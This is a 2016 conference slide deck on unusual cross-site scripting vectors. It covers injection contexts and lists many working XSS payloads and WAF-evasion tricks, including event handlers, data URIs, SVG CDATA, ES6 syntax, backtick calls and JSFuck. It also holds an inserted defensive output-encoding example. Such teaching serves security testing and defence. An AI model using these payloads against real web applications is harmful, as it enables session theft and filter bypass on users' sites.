ESOTERIC XSS
PAYLOADS
c0c0n2016
@riyazwalikar
@wincmdfu
RIYAZ WALIKAR
Chief Offensive Security Officer @Appsecco
Security evangelist, leader for null Bangalore and OWASP chapters
Trainer/Speaker : BlackHat, defcon, nullcon, c0c0n, OWASP AppSec USA
Twitter : @riyazwalikar and @wincmdfu
http://ibreak.software
WHAT IS THIS TALK ABOUT?
Quick contexts
Uncommon XSS vectors
WHAT ARE INJECTION CONTEXTS?
Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact of user input appearing in the page would depend on the context in which the browser tries to interpret the user input.
Lavakumar Kuppan, IronWASP
3 MOST COMMON INJECTION CONTEXTS
HTML context
HTML Element context
Script context
HTML CONTEXT
<html>
    <body>
        Welcome user_tainted_input!
    </body>
</html>
HTML ELEMENT CONTEXT
<html>
    <body>
        Welcome bob!
        <input id="user" name="user" value=user_tainted_input>
    </body>
</html>
SCRIPT CONTEXT
<html>
    <body>
        Welcome bob!
        <script>
            var a = user_tainted_input;
        </script>
    </body>
</html>
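As an added example (not from the talk), here is a context-aware output encoder in JavaScript for the three contexts above; all function names and the sample input are hypothetical. It also shows the script-context caveat that JSON.stringify alone leaves a literal </script> visible to the HTML parser.

```javascript
// Added example, not from the talk. Hypothetical helper names.

// HTML context: entity-encode every character that can start markup.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: quote the attribute AND entity-encode.
// An unquoted value=user_tainted_input lets a space start a new
// attribute (for example an event handler); encoding alone cannot fix that.
function encodeForHtmlAttr(s) {
  return '"' + encodeForHtml(s) + '"';
}

// Script context: emit a JSON string literal, then additionally escape
// '<', '>', '&' and U+2028/U+2029 as \uXXXX so the HTML parser never sees
// "</script>" inside the literal. JSON.stringify by itself leaves them raw.
function encodeForScript(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Constructed tainted input that targets all three contexts at once.
const TAINTED = 'bob" onfocus=x autofocus>&</script><svg>';

// Render the three slides' snippets with the right encoder per context.
function renderWelcome(name) {
  return [
    'Welcome ' + encodeForHtml(name) + '!',
    '<input id="user" name="user" value=' + encodeForHtmlAttr(name) + '>',
    '<script>var a = ' + encodeForScript(name) + ';</script>',
  ].join('\n');
}

// Helper for checking the result: count non-overlapping occurrences.
function countOccurrences(haystack, needle) {
  return haystack.split(needle).length - 1;
}
```

For the constructed input, the rendered page contains exactly the three tags the template itself emits (`<input`, `<script>`, `</script>`) and no markup from the input.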
Common vectors?
<script>alert(document.cookie)</script>
<svg onload=alert(document.cookie)>
<input onfocus=alert(document.cookie) autofocus>
Multiple ways of representation
document.cookie
document['cookie']
document['coo'+'kie']
eval('doc'+'ument')['coo'+'kie']
Autoscrolling the page
<body onscroll=alert(1)>
<br>
<br>
<br>
<br>
<br>
<br>
...
<br>
<br>
<br>
<br>
<br>
<input autofocus>
New HTML Elements
<video><source onerror="alert(1)">
<details open ontoggle="alert(1)"> <!-- Chrome only -->
Using the CDATA section inside SVG
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
Using DATA URIs
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
Using the embed tag
<embed src="javascript:alert(1)"></embed>
Overwriting the ReferenceError object
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
ES6 Computed properties
({[alert(1)]: 1})
({[eval('ale'+'rt')(0)]: 1 })
Back ticks FTW!
No enclosing brackets required:
alert `1`
Expansion of \u{61} and backticks
loc\u{61}tion='j\u{61}vascript:alert`1`'
Prototyping the .toString() method
Object.prototype[Symbol.toStringTag]='<img src=1 onerror=alert(0)>';
location='javascript:1+{}'
JSFUCK
JSFuck is an esoteric and educational programming style
based on the atomic parts of JavaScript. It uses only six
different characters to write and execute code - ()+[]!
false       =>  ![]
true        =>  !![]
undefined   =>  [][[]]
NaN         =>  +[![]]
0           =>  +[]
1           =>  +!+[]
2           =>  !+[]+!+[]
10          =>  [+!+[]]+[+[]]
Array       =>  []
Number      =>  +[]
String      =>  []+[]
Boolean     =>  ![]
Function    =>  []["filter"]
eval        =>  []["filter"]["constructor"]( CODE )()
window      =>  []["filter"]["constructor"]("return this")()
alert(0)
(![]+[])[1]+(![]+[])[2]+(![]+[])[4]+(!![]+[])[1]+(!![]+[])[0]+"(0)"
The ES6 specification coupled with new HTML 5 elements and event handlers can be used to bypass most blacklist-based web application firewalls.
A lot of active research has been done in this area by @0x6D6172696F and the good folks at cure53
Q & A
@riyazwalikar
@wincmdfu
http://ibreak.software
REFERENCES:
http://blog.ironwasp.org/2014/07/contexts-and-cross-site-scripting-brief.html
https://github.com/riyazwalikar/simplexssapp
https://html5sec.org/
http://www.jsfuck.com/
http://blog.innerht.ml/cascading-style-scripting
https://cure53.de/es6-for-penetration-testers.pdf